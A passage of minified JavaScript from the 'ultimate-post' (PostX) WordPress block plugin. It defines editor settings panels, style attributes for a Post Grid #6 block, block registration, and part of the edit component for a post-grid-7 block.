Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],exSettings:["catPosition"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},91962:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},columnFlip:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},columnGridGap:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); } \n          {{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},anotherKey:"columnGridGap",style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-content-overlay  { height: calc({{overlayHeight}}/2 - {{columnGridGap}}px / 2 ); } \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-block-row { max-height: {{overlayHeight}}; } \n          {{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-empty-image {width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img {min-height: {{overlayHeight}};} \n          @media (max-width: 768px) { \n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n            {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit;}\n          }"}]},queryNumber:{type:"string",default:"5",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]},{key:"querySticky",condition:"!=",value:!0}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},showImage:{type:"boolean",default:!0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"simgleGradient",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallCat:{type:"boolean",default:!1},metaListSmall:{type:"string",default:'["metaDate"]'},showSmallMeta:{type:"boolean",default:!1},excerptShow:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse;justify-content: flex-end; }"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},headingText:{type:"string",default:"Post Grid #6"},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }{{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationShow:{type:"boolean",default:!1},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advFilter","pagiBlockCompatibility","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["paginationText","loadMoreText","paginationAjax","pagiMargin","queryNumPosts"],[{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:"emptyspace"},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreColor",default:"#fff"}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},96405:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(63230),r=l(91962),s=l(35341);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-6/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-6.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid6.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-6")]},edit:n.Z,save:()=>null})},12705:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(11070);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useRef:_,useState:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=_(null),[l,B]=C(f.Ti),[U,M]=C(null),{setAttributes:A,name:H,attributes:N,clientId:j,context:Z,isSelected:O,className:R,attributes:{blockId:D,excerptLimit:z,metaStyle:F,metaShow:W,catShow:V,showImage:G,metaSeparator:q,titleShow:$,catStyle:K,catPosition:J,titlePosition:Y,excerptShow:X,imgAnimation:Q,imgOverlayType:ee,imgOverlay:te,metaList:le,metaListSmall:oe,showSmallCat:ae,readMore:ie,readMoreText:ne,readMoreIcon:re,overlayContentPosition:se,showSmallBtn:pe,showSmallExcerpt:ce,metaPosition:ue,showFullExcerpt:de,layout:me,titleAnimation:ge,customCatColor:ye,onlyCatColor:be,contentTag:ve,titleTag:he,showSeoMeta:fe,titleLength:ke,metaMinText:we,metaAuthorPrefix:xe,titleStyle:Te,metaDateFormat:_e,authorLink:Ce,imgCrop:Ee,imgCropSmall:Se,fallbackEnable:Pe,vidIconEnable:Le,notFoundMessage:Ie,dcEnabled:Be,dcFields:Ue,previewImg:Me,advanceId:Ae,paginationShow:He,headingShow:Ne,filterShow:je,paginationType:Ze,navPosition:Oe,V4_1_0_CompCheck:{runComp:Re},currentPostId:De}}=e;function ze(e){B({...l,selectedDC:e})}function Fe(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function We(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function Ve(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function Ge(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),Ge()}),[]),T((()=>{const t=j.substr(0,6),l=L(I(j));(0,a.qi)(A,l,De,j),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[j]),T((()=>{const e=t.current;(0,b.o6)()&&0===N.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&(Ge(),t.current=N),e.isSelected!==O&&O&&(0,f.gT)(We,Ve)):t.current=N}),[N]);const qe={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:N,setSection:We,section:l.section,clientId:j,context:Z,setSelectedDc:ze,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){ze(e),Ve("dc_group")}};let $e;if(D&&($e=(0,m.Kh)(N,"ultimate-post/post-grid-7",D,(0,a.k0)())),Me&&!O)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Me});T((()=>{O&&Me&&A({previewImg:""})}),[e?.isSelected]);const Ke=x({...Ae&&{id:Ae},className:`ultp-block-${D} ${R}`,onClick:e=>{e.stopPropagation(),We("general"),Ve("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:qe,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:qe})),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-7",key:"layout",options:[{img:"assets/img/layouts/pg7/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg7/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg7/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Re?"exclude":"dep"]:a.N2,pro:["metaShow","catShow"]}],store:qe}),(0,o.createElement)("div",Ke,$e&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:$e}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ne||je||He)&&(0,o.createElement)(r.m,{attributes:N,setAttributes:A,onClick:()=>{We("heading"),Ve("heading")},setSection:We,setToolbarSettings:Ve}),function(){const 